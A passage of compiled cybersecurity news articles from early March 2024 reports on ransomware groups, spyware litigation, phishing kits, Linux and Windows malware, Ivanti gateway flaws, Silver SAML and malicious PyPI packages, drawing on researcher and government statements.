Active since May 2019, multiple variants of Phobos ransomware have been identified to date, namely Eking, Eight, Elbie, Devos, Faust, and Backmydata. Late last year, Cisco Talos revealed that the threat actors behind the 8Base ransomware are leveraging a Phobos ransomware variant to conduct their financially motivated attacks.
There is evidence to suggest that Phobos is likely closely managed by a central authority, which controls the ransomware's private decryption key.
Attack chains involving the ransomware strain have typically leveraged phishing as an initial access vector to drop stealthy payloads like SmokeLoader. Alternatively, vulnerable networks are breached by hunting for exposed RDP services and exploiting them by means of a brute-force attack.
A successful digital break-in is followed by the threat actors dropping additional remote access tools, taking advantage of process injection techniques to execute malicious code and evade detection, and making Windows Registry modifications to maintain persistence within compromised environments.
"Additionally, Phobos actors have been observed using built-in Windows API functions to steal tokens, bypass access controls, and create new processes to escalate privileges by leveraging the SeDebugPrivilege process," the agencies said. "Phobos actors attempt to authenticate using cached password hashes on victim machines until they reach domain administrator access."
The e-crime group is also known to use open-source tools such as Bloodhound and Sharphound to enumerate the active directory. File exfiltration is accomplished via WinSCP and Mega.io, after which volume shadow copies are deleted in an attempt to make recovery harder.
The disclosure comes as Bitdefender detailed a meticulously coordinated ransomware attack impacting two separate companies at the same time. The attack, described as synchronized and multifaceted, has been attributed to a ransomware actor called CACTUS.
"CACTUS continued infiltrating the network of one organization, implanting various types of remote access tools and tunnels across different servers," Martin Zugec, technical solutions director at Bitdefender, said in a report published last week.
"When they identified an opportunity to move to another company, they momentarily paused their operation to infiltrate the other network. Both companies are part of the same group, but operate independently, maintaining separate networks and domains without any established trust relationship."
The attack is also notable for the targeting of the unnamed company's
virtualization infrastructure, indicating that CACTUS actors have broadened
their focus beyond Windows hosts to strike Hyper-V and VMware ESXi hosts.
It also leveraged a critical security flaw (CVE-2023-38035, CVSS score: 9.8) in an internet-exposed Ivanti Sentry server less than 24 hours after its initial disclosure in August 2023, once again highlighting opportunistic and rapid weaponization of newly published vulnerabilities.
Ransomware continues to be a major money spinner for financially motivated threat actors, with initial ransomware demands reaching a median of $600,000 in 2023, a 20% jump from the previous year, according to Arctic Wolf. As of Q4 2023, the average ransom payment stands at $568,705 per victim.
What's more, paying a ransom demand does not amount to future protection. There is no guarantee that a victim's data and systems will be safely recovered and that the attackers won't sell the stolen data on underground forums or attack them again.
Data shared by cybersecurity company Cybereason shows that "a staggering 78% [of organizations] were attacked again after paying the ransom – 82% of them within a year," in some cases by the same threat actor. Of these victims, 63% were "asked to pay more the second time."
U.S. Court Orders NSO Group to Hand Over Pegasus Spyware Code to WhatsApp
2.3.24
BigBrothers
The Hacker News
A U.S. judge has ordered NSO Group to hand over its
source code for Pegasus and other products to Meta as part of the social media
giant's ongoing litigation against the Israeli spyware vendor.
The decision, which marks a major legal victory for Meta, which filed the lawsuit in October 2019 for using its infrastructure to distribute the spyware to approximately 1,400 mobile devices between April and May. This also included two dozen Indian activists and journalists.
These attacks leveraged a then zero-day flaw in the instant messaging app (CVE-2019-3568, CVSS score: 9.8), a critical buffer overflow bug in the voice call functionality, to deliver Pegasus by merely placing a call, even in scenarios where the calls were left unanswered.
In addition, the attack chain included steps to erase the incoming call information from the logs in an attempt to sidestep detection.
Court documents released late last month show that NSO Group has been asked to "produce information concerning the full functionality of the relevant spyware," specifically for a period of one year before the alleged attack to one year after the alleged attack (i.e., from April 29, 2018, to May 10, 2020).
That said, the company doesn't have to "provide specific information regarding the server architecture at this time" because WhatsApp "would be able to glean the same information from the full functionality of the alleged spyware." Perhaps more significantly, it has been spared from sharing the identities of its clientele.
"While the court's decision is a positive development, it is disappointing that NSO Group will be allowed to continue keeping the identity of its clients, who are responsible for this unlawful targeting, secret," said Donncha Ó Cearbhaill, head of the Security Lab at Amnesty International.
NSO Group was sanctioned by the U.S. in 2021 for developing and supplying cyber weapons to foreign governments that "used these tools to maliciously target government officials, journalists, businesspeople, activists, academics, and embassy workers."
The development comes as Recorded Future revealed a new multi-tiered delivery infrastructure associated with Predator, a mercenary mobile spyware managed by the Intellexa Alliance.
The infrastructure network is highly likely associated with Predator customers, including in countries like Angola, Armenia, Botswana, Egypt, Indonesia, Kazakhstan, Mongolia, Oman, the Philippines, Saudi Arabia, and Trinidad and Tobago. It's worth noting that no Predator customers within Botswana and the Philippines had been identified until now.
"Although Predator operators respond to public reporting by altering certain aspects of their infrastructure, they seem to persist with minimal alterations to their modes of operation; these include consistent spoofing themes and focus on types of organizations, such as news outlets, while adhering to established infrastructure setups," the company said.
U.S. Charges Iranian Hacker, Offers $10 Million Reward for Capture
2.3.24
Crime
The Hacker News
The U.S. Department of Justice (DoJ) on Friday unsealed an indictment against an Iranian national for his alleged involvement in a multi-year cyber-enabled campaign designed to compromise U.S. governmental and private entities.
More than a dozen entities are said to have been targeted, including the U.S. Departments of the Treasury and State, defense contractors that support U.S. Department of Defense programs, and an accounting firm and a hospitality company, both based in New York.
Alireza Shafie Nasab, 39, claimed to be a cybersecurity specialist for a company named Mahak Rayan Afraz while participating in a persistent campaign targeting the U.S. from at least in or about 2016 through or about April 2021.
"As alleged, Alireza Shafie Nasab participated in a cyber campaign using spear-phishing and other hacking techniques to infect more than 200,000 victim devices, many of which contained sensitive or classified defense information," said U.S. Attorney Damian Williams for the Southern District of New York.
The spear-phishing campaigns were managed via a custom application that made it possible for Nasab and his co-conspirators to organize and deploy their attacks.
In one instance, the threat actors breached an administrator email account belonging to an unnamed defense contractor, subsequently leveraging the access to create rogue accounts and send out spear-phishing emails to employees of a different defense contractor and a consulting firm.
Outside of spear-phishing attacks, the conspirators have masqueraded as other people, typically women, to obtain the confidence of victims and deploy malware onto victim computers.
Nasab, while working for the front company, is believed to be responsible for procuring infrastructure utilized in the campaign by using the stolen identity of a real person in order to register a server and email accounts.
He has been charged with one count of conspiracy to commit computer fraud, one count of conspiracy to commit wire fraud, one count of wire fraud, and one count of aggravated identity theft. If convicted on all counts, Nasab could face up to 47 years in prison.
While Nasab remains at large, the U.S. State Department has announced monetary rewards of up to $10 million for information leading to the identification or location of Nasab.
Mahak Rayan Afraz (MRA) was first outed by Meta in July 2021 as a Tehran-based firm with ties to the Islamic Revolutionary Guard Corps (IRGC), Iran's armed force charged with defending the country's revolutionary regime.
The activity cluster, which also overlaps with Tortoiseshell, has been previously linked to elaborate social engineering campaigns, including posing as an aerobics instructor on Facebook in an attempt to infect the machine of an employee of an aerospace defense contractor with malware.
The development comes as German law enforcement announced the takedown of Crimemarket, a German-speaking illicit trading platform with over 180,000 users that specialized in the sale of narcotics, weapons, money laundering, and other criminal services.
Six people have been arrested in connection with the operation, counting a 23-year-old considered the main suspect, with authorities also seizing mobile phones, IT equipment, one kilogram of marijuana, ecstasy tablets, and €600,000 in cash.
New Phishing Kit Leverages SMS, Voice Calls to Target Cryptocurrency Users
2.3.24
Cryptocurrency
The Hacker News
A novel phishing kit has been observed impersonating the
login pages of well-known cryptocurrency services as part of an attack cluster
codenamed CryptoChameleon that's designed to primarily target mobile devices.
"This kit enables attackers to build carbon copies of single sign-on (SSO) pages, then use a combination of email, SMS, and voice phishing to trick the target into sharing usernames, passwords, password reset URLs, and even photo IDs from hundreds of victims, mostly in the United States," Lookout said in a report.
Targets of the phishing kit include employees of the Federal Communications Commission (FCC), Binance, Coinbase, and cryptocurrency users of various platforms like Binance, Coinbase, Gemini, Kraken, ShakePay, Caleb & Brown, and Trezor. More than 100 victims have been successfully phished to date.
The phishing pages are designed such that the fake login screen is displayed only after the victim completes a CAPTCHA test using hCaptcha, thus preventing automated analysis tools from flagging the sites.
In some cases, these pages are distributed via unsolicited phone calls and text messages by spoofing a company's customer support team under the pretext of securing their account after a purported hack.
Once the user enters their credentials, they are either asked to provide a two-factor authentication (2FA) code or asked to "wait" while it claims to verify the provided information.
"The attacker likely attempts to log in using these credentials in real time, then redirects the victim to the appropriate page depending on what additional information is requested by the MFA service the attacker is trying to access," Lookout said.
The phishing kit also attempts to give an illusion of credibility by allowing the operator to customize the phishing page in real-time by providing the last two digits of the victim's actual phone number and selecting whether the victim should be asked for a six or seven digit token.
The one-time password (OTP) entered by the user is then captured by the threat actor, who uses it to sign in to the desired online service using the provided token. In the next step, the victim can be directed to any page of the attacker's choosing, including the legitimate Okta login page or a page that displays customized messages.
Lookout said CryptoChameleon's modus operandi resembles techniques used by Scattered Spider, specifically in its impersonation of Okta and the use of domains that have been previously identified as affiliated with the group.
"Despite the URLs and spoofed pages looking similar to what Scattered Spider
might create, there are significantly different capabilities and C2
infrastructure within the phishing kit," the company said. "This type of
copycatting is common amongst threat actor groups, especially when a series of
tactics and procedures have had so much public success."
It's currently also not clear if this is the work of a single threat actor or a common tool being used by different groups.
"The combination of high quality phishing URLs, login pages that perfectly match the look and feel of the legitimate sites, a sense of urgency, and consistent connection through SMS and voice calls is what has given the threat actors so much success stealing high quality data," Lookout noted.
The development comes as Fortra revealed that financial institutions in Canada have come under the target of a new phishing-as-service (PhaaS) group called LabHost, overtaking its rival Frappo in popularity in 2023.
LabHost's phishing attacks are pulled off by means of a real-time campaign management tool named LabRat that makes it possible to stage an adversary-in-the-middle (AiTM) attack and capture credentials and 2FA codes.
Also developed by the threat actor is an SMS spamming tool dubbed LabSend that provides an automated method for sending links to LabHost phishing pages, thereby allowing its customers to mount smishing campaigns at scale.
"LabHost services allow threat actors to target a variety of financial institutions with features ranging from ready-to-use templates, real-time campaign management tools, and SMS lures," the company said.
New BIFROSE Linux Malware Variant Using Deceptive VMware Domain for Evasion
2.3.24
Virus
The Hacker News
Cybersecurity researchers have discovered a new Linux
variant of a remote access trojan (RAT) called BIFROSE (aka Bifrost) that uses a
deceptive domain mimicking VMware.
"This latest version of Bifrost aims to bypass security measures and compromise targeted systems," Palo Alto Networks Unit 42 researchers Anmol Maurya and Siddharth Sharma said.
BIFROSE is one of the long-standing threats that has been active since 2004. It has been offered for sale in underground forums for up to $10,000 in the past, according to a report from Trend Micro in December 2015.
The malware has been put to use by a state-backed hacking group from China tracked as BlackTech (aka Circuit Panda, HUAPI, Manga Taurus, Palmerworm, PLEAD, Red Djinn, and Temp.Overboard), which has a history of striking organizations in Japan, Taiwan, and the U.S.
It's suspected that the threat actor purchased the source code or gained access to it around 2010, and repurposed the malware for use in its own campaigns via custom backdoors like KIVARS and XBOW.
Linux variants of BIFROSE (aka ELF_BIFROSE) have been observed since at least 2020 with capabilities to launch remote shells, download/upload files, and perform file operations.
"Attackers typically distribute Bifrost through email attachments or malicious websites," the researchers said. "Once installed on a victim's computer, Bifrost allows the attacker to gather sensitive information, like the victim's hostname and IP address."
What makes the latest variant noteworthy is that it reaches out to a command-and-control (C2) server with the name "download.vmfare[.]com" in an attempt to masquerade as VMware. The deceptive domain is resolved by contacting a Taiwan-based public DNS resolver with the IP address 168.95.1[.]1.
Unit 42 said it detected a spike in Bifrost activity since October 2023, identifying no less than 104 artifacts in its telemetry. It further discovered an Arm version of the malware, suggesting the threat actors are likely looking to expand their attack surface.
"With new variants that employ deceptive domain strategies like typosquatting, a
recent spike in Bifrost activity highlights the dangerous nature of this
malware," the researchers said.
The development comes as McAfee Labs detailed a new GuLoader campaign that propagates the malware through malicious SVG file attachments in email messages. The malware has also been observed being distributed via VBS scripts as part of a multi-stage payload delivery.
"This recent surge highlights its evolving tactics for broader reach and evasion," Trustwave SpiderLabs said in a post on X earlier this week.
The Bifrost and GuLoader attacks coincide with the release of a new version of the Warzone RAT, which recently had two of its operators arrested and its infrastructure dismantled by the U.S. government.
Five Eyes Agencies Warn of Active Exploitation of Ivanti Gateway Vulnerabilities
1.3.24
Exploit
The Hacker News
The Five Eyes (FVEY) intelligence alliance has issued a new cybersecurity advisory warning of cyber threat actors exploiting known security flaws in Ivanti Connect Secure and Ivanti Policy Secure gateways, noting that the Integrity Checker Tool (ICT) can be deceived to provide a false sense of security.
"Ivanti ICT is not sufficient to detect compromise and that a cyber threat actor may be able to gain root-level persistence despite issuing factory resets," the agencies said.
To date, Ivanti has disclosed five security vulnerabilities impacting its products since January 10, 2024, out of which four have come under active exploitation by multiple threat actors to deploy malware -
CVE-2023-46805 (CVSS score: 8.2) - Authentication bypass vulnerability in web
component
CVE-2024-21887 (CVSS score: 9.1) - Command injection vulnerability
in web component
CVE-2024-21888 (CVSS score: 8.8) - Privilege escalation
vulnerability in web component
CVE-2024-21893 (CVSS score: 8.2) - SSRF
vulnerability in the SAML component
CVE-2024-22024 (CVSS score: 8.3) - XXE
vulnerability in the SAML component
Mandiant, in an analysis published this
week, described how an encrypted version of malware known as BUSHWALK is placed
in a directory excluded by ICT in /data/runtime/cockpit/diskAnalysis.
The directory exclusions were also previously highlighted by Eclypsium this month, stating the tool skips a dozen directories from being scanned, thus allowing an attacker to leave behind backdoors in one of these paths and still pass the integrity check.
"The safest course of action for network defenders is to assume a sophisticated threat actor may deploy rootkit level persistence on a device that has been reset and lay dormant for an arbitrary amount of time," agencies from Australia, Canada, New Zealand, the U.K., and the U.S. said.
They also urged organizations to "consider the significant risk of adversary access to, and persistence on, Ivanti Connect Secure and Ivanti Policy Secure gateways when determining whether to continue operating these devices in an enterprise environment."
Ivanti, in response to the advisory, said it's not aware of any instances of successful threat actor persistence following the implementation of security updates and factory resets. It's also releasing a new version of ICT that it said "provides additional visibility into a customer's appliance and all files that are present on the system."
GitHub Rolls Out Default Secret Scanning Push Protection for Public Repositories
1.3.24
Security
The Hacker News
GitHub on Thursday announced that it's enabling secret
scanning push protection by default for all pushes to public repositories.
"This means that when a supported secret is detected in any push to a public repository, you will have the option to remove the secret from your commits or, if you deem the secret safe, bypass the block," Eric Tooley and Courtney Claessens said.
Push protection was first piloted as an opt-in feature in August 2023, although it has been under testing since April 2022. It became generally available in May 2023.
The secret scanning feature is designed to identify over 200 token types and patterns from more than 180 service providers in order to prevent their fraudulent use by malicious actors.
The development comes nearly five months after the Microsoft subsidiary expanded secret scanning to include validity checks for popular services such as Amazon Web Services (AWS), Microsoft, Google, and Slack.
It also follows the discovery of an ongoing "repo confusion" attack targeting GitHub that's inundating the source code hosting platform with thousands of repositories containing obfuscated malware capable of stealing passwords and cryptocurrency from developer devices.
The attacks represent another wave of the same malware distribution campaign
that was disclosed by Phylum and Trend Micro last year, leveraging bogus Python
packages hosted on the cloned, trojanized repositories to deliver a stealer
malware called BlackCap Grabber.
"Repo confusion attacks simply rely on humans to mistakenly pick the malicious version over the real one, sometimes employing social engineering techniques as well," Apiiro said in a report this week.
New Silver SAML Attack Evades Golden SAML Defenses in Identity Systems
1.3.24
Attack
The Hacker News
Cybersecurity researchers have disclosed a new attack technique called Silver SAML that can be successful even in cases where mitigations have been applied against Golden SAML attacks.
Silver SAML "enables the exploitation of SAML to launch attacks from an identity provider like Entra ID against applications configured to use it for authentication, such as Salesforce," Semperis researchers Tomer Nahum and Eric Woodruff said in a report shared with The Hacker News.
Golden SAML (short for Security Assertion Markup Language) was first documented by CyberArk in 2017. The attack vector, in a nutshell, entails the abuse of the interoperable authentication standard to impersonate almost any identity in an organization.
It's also similar to the Golden Ticket attack in that it grants attackers the ability to gain unauthorized access to any service in a federation with any privileges and to stay persistent in this environment in a stealthy manner.
"Golden SAML introduces to a federation the advantages that golden ticket offers in a Kerberos environment – from gaining any type of access to stealthily maintaining persistency," security researcher Shaked Reiner noted at the time.
Real-world attacks leveraging the method have been rare, the first recorded use being the compromise of SolarWinds infrastructure to gain administrative access by forging SAML tokens using compromised SAML token signing certificates.
Golden SAML has also been weaponized by an Iranian threat actor codenamed Peach Sandstorm in a March 2023 intrusion to access an unnamed target's cloud resources sans requiring any password, Microsoft revealed in September 2023.
The latest approach is a spin on Golden SAML that works with an identity
provider (IdP) like Microsoft Entra ID (formerly Azure Active Directory) and
doesn't require access to the Active Directory Federation Services (AD FS). It
has been assessed as a moderate-severity threat to organizations.
"Within Entra ID, Microsoft provides a self-signed certificate for SAML response signing," the researchers said. "Alternatively, organizations can choose to use an externally generated certificate such as those from Okta. However, that option introduces a security risk."
"Any attacker that obtains the private key of an externally generated certificate can forge any SAML response they want and sign that response with the same private key that Entra ID holds. With this type of forged SAML response, the attacker can then access the application — as any user."
Following responsible disclosure to Microsoft on January 2, 2024, the company said the issue does not meet its bar for immediate servicing, but noted it will take appropriate action as needed to safeguard customers.
While there is no evidence that Silver SAML has been exploited in the wild, organizations are required to use only Entra ID self-signed certificates for SAML signing purposes. Semperis has also made available a proof-of-concept (PoC) dubbed SilverSAMLForger to create custom SAML responses.
"Organizations can monitor Entra ID audit logs for changes to PreferredTokenSigningKeyThumbprint under ApplicationManagement," the researchers said.
"You will need to correlate those events to Add service principal credential events that relate to the service principal. The rotation of expired certificates is a common process, so you will need to determine whether the audit events are legitimate. Implementing change control processes to document the rotation can help to minimize confusion during rotation events."
GTPDOOR Linux Malware Targets Telecoms, Exploiting GPRS Roaming Networks
1.3.24
Virus
The Hacker News
Threat hunters have discovered a new Linux malware called GTPDOOR that's designed to be deployed in telecom networks that are adjacent to GPRS roaming exchanges (GRX)
The malware is novel in the fact that it leverages the GPRS Tunnelling Protocol (GTP) for command-and-control (C2) communications.
GPRS roaming allows subscribers to access their GPRS services while they are beyond the reach of their home mobile network. This is facilitated by means of a GRX that transports the roaming traffic using GTP between the visited and the home Public Land Mobile Network (PLMN).
Security researcher haxrob, who discovered two GTPDOOR artifacts uploaded to VirusTotal from China and Italy, said the backdoor is likely linked to a known threat actor tracked as LightBasin (aka UNC1945), which was previously disclosed by CrowdStrike in October 2021 in connection with a series of attacks targeting the telecom sector to steal subscriber information and call metadata.
"When run, the first thing GTPDOOR does is process-name stomps itself – changing
its process name to '[syslog]' – disguised as syslog invoked from the kernel,"
the researcher said. "It suppresses child signals and then opens a raw socket
[that] will allow the implant to receive UDP messages that hit the network
interfaces."
Put differently, GTPDOOR allows a threat actor that already has established persistence on the roaming exchange network to contact a compromised host by sending GTP-C Echo Request messages with a malicious payload.
This magic GTP-C Echo Request message acts as a conduit to transmit a command to be executed on the infected machine and return the results back to the remote host.
GTPDOOR "Can be covertly probed from an external network to elicit a response by sending a TCP packet to any port number," the researcher noted. "If the implant is active a crafted empty TCP packet is returned along with information if the destination port was open/responding on the host."
"This implant looks like it is designed to sit on compromised hosts that directly touch the GRX network – these are the systems that communicate to other telecommunication operator networks via the GRX."
Lazarus Hackers Exploited Windows Kernel Flaw as Zero-Day in Recent Attacks
1.3.24
Exploit
The Hacker News
The notorious Lazarus Group actors exploited a recently patched privilege escalation flaw in the Windows Kernel as a zero-day to obtain kernel-level access and disable security software on compromised hosts.
The vulnerability in question is CVE-2024-21338 (CVSS score: 7.8), which can permit an attacker to gain SYSTEM privileges. It was resolved by Microsoft earlier this month as part of Patch Tuesday updates.
"To exploit this vulnerability, an attacker would first have to log on to the system," Microsoft said. "An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system."
While there were no indications of active exploitation of CVE-2024-21338 at the time of the release of the updates, Redmond on Wednesday revised its "Exploitability assessment" for the flaw to "Exploitation Detected."
It’s currently not clear when the attacks took place, but the vulnerability is said to have been introduced in Window 10, version 1703 (RS2/15063) when the 0x22A018 IOCTL (short for input/output control) handler was first implemented.
Cybersecurity vendor Avast, which discovered an in-the-wild admin-to-kernel exploit for the bug, said the kernel read/write primitive achieved by weaponizing the flaw allowed the Lazarus Group to "perform direct kernel object manipulation in an updated version of their data-only FudModule rootkit."
The FudModule rootkit was first reported by ESET and AhnLab in October 2022 as capable of disabling the monitoring of all security solutions on infected hosts by means of what's called a Bring Your Own Vulnerable Driver (BYOVD) attack, wherein an attacker implants a driver susceptible to a known or zero-day flaw to escalate privileges.
What makes the latest attack significant is that it goes "beyond BYOVD by exploiting a zero-day in a driver that's known to be already installed on the target machine." That susceptible driver is appid.sys, which is crucial to the functioning of a Windows component called AppLocker that's responsible for application control.
The real-world exploit devised by the Lazarus Group entails using CVE-2024-21338
in the appid.sys driver to execute arbitrary code in a manner that bypasses all
security checks and runs the FudModule rootkit.
"FudModule is only loosely integrated into the rest of Lazarus' malware ecosystem and that Lazarus is very careful about using the rootkit, only deploying it on demand under the right circumstances," security researcher Jan Vojtěšek said, describing the malware as under active development.
Besides taking steps to sidestep detection by disabling system loggers, FudModule is engineered to turn off specific security software such as AhnLab V3 Endpoint Security, CrowdStrike Falcon, HitmanPro, and Microsoft Defender Antivirus (formerly Windows Defender).
The development marks a new level of technical sophistication associated with North Korean hacking groups, continuously iterating its arsenal for improved stealth and functionality. It also illustrates the elaborate techniques employed to hinder detection and make their tracking much harder.
The adversarial collective's cross-platform focus is also exemplified by the fact that it has been observed using bogus calendar meeting invite links to stealthily install malware on Apple macOS systems, a campaign that was previously documented by SlowMist in December 2023.
"Lazarus Group remains among the most prolific and long-standing advanced persistent threat actors," Vojtěšek said. "The FudModule rootkit serves as the latest example, representing one of the most complex tools Lazarus holds in their arsenal."
New Backdoor Targeting European Officials Linked to Indian Diplomatic Events
1.3.24
Virus
The Hacker News
A previously undocumented threat actor dubbed SPIKEDWINE
has been observed targeting officials in European countries with Indian
diplomatic missions using a new backdoor called WINELOADER.
The adversary, according to a report from Zscaler ThreatLabz, used a PDF file in emails that purported to come from the Ambassador of India, inviting diplomatic staff to a wine-tasting event on February 2, 2024.
The PDF document was uploaded to VirusTotal from Latvia on January 30, 2024. That said, there is evidence to suggest that this campaign may have been active at least since July 6, 2023, going by the discovery of another similar PDF file uploaded from the same country.
"The attack is characterized by its very low volume and the advanced tactics, techniques, and procedures (TTPs) employed in the malware and command-and-control (C2) infrastructure," security researchers Sudeep Singh and Roy Tay said.
Central to the novel attack is the PDF file that comes embedded with a malicious
link that masquerades as a questionnaire, urging the recipients to fill it out
in order to participate. Clicking on the link paves the way for an HTML
application ("wine.hta") that contains obfuscated JavaScript code to retrieve an
encoded ZIP archive bearing WINELOADER from the same domain.
The malware is packed with a core module that's designed to Execute modules from the C2 server, inject itself into another dynamic-link library (DLL), and update the sleep interval between beacon requests.
A notable aspect of the cyber incursions is the use of compromised websites for C2 and hosting intermediate payloads. It's suspected that the "C2 server only responds to specific types of requests at certain times," thereby making the attacks more evasive.
"The threat actor put additional effort into remaining undetected by evading memory forensics and automated URL scanning solutions," the researchers said.
Lazarus Exploits Typos to Sneak PyPI Malware into Dev Systems
1.3.24
Virus
The Hacker News
The notorious North Korean state-backed hacking group Lazarus uploaded four packages to the Python Package Index (PyPI) repository with the goal of infecting developer systems with malware.
The packages, now taken down, are pycryptoenv, pycryptoconf, quasarlib, and swapmempool. They have been collectively downloaded 3,269 times, with pycryptoconf accounting for the most downloads at 1,351.
"The package names pycryptoenv and pycryptoconf are similar to pycrypto, which is a Python package used for encryption algorithms in Python," JPCERT/CC researcher Shusei Tomonaga said. "Therefore, the attacker probably prepared the malware-containing malicious packages to target users' typos in installing Python packages."
The disclosure comes days after Phylum uncovered several rogue packages on the npm registry that have been used to single out software developers as part of a campaign codenamed Contagious Interview.
An interesting commonality between the two sets of attacks is that the malicious code is concealed within a test script ("test.py"). In this case, however, the test file is merely a smokescreen for what's an XOR-encoded DLL file, which, in turn, creates two DLL files named IconCache.db and NTUSER.DAT.
The attack sequence then uses NTUSER.DAT to load and execute IconCache.db, a malware called Comebacker that's responsible for establishing connections with a command-and-control (C2) server to fetch and run a Windows executable file.
JPCERT/CC said the packages are a continuation of a campaign that Phylum first detailed in November 2023 as leveraging crypto-themed npm modules to deliver Comebacker.
"Attackers may be targeting users' typos to have the malware downloaded," Tomonaga said. "When you install modules and other kinds of software in your development environment, please do so carefully to avoid installing unwanted packages."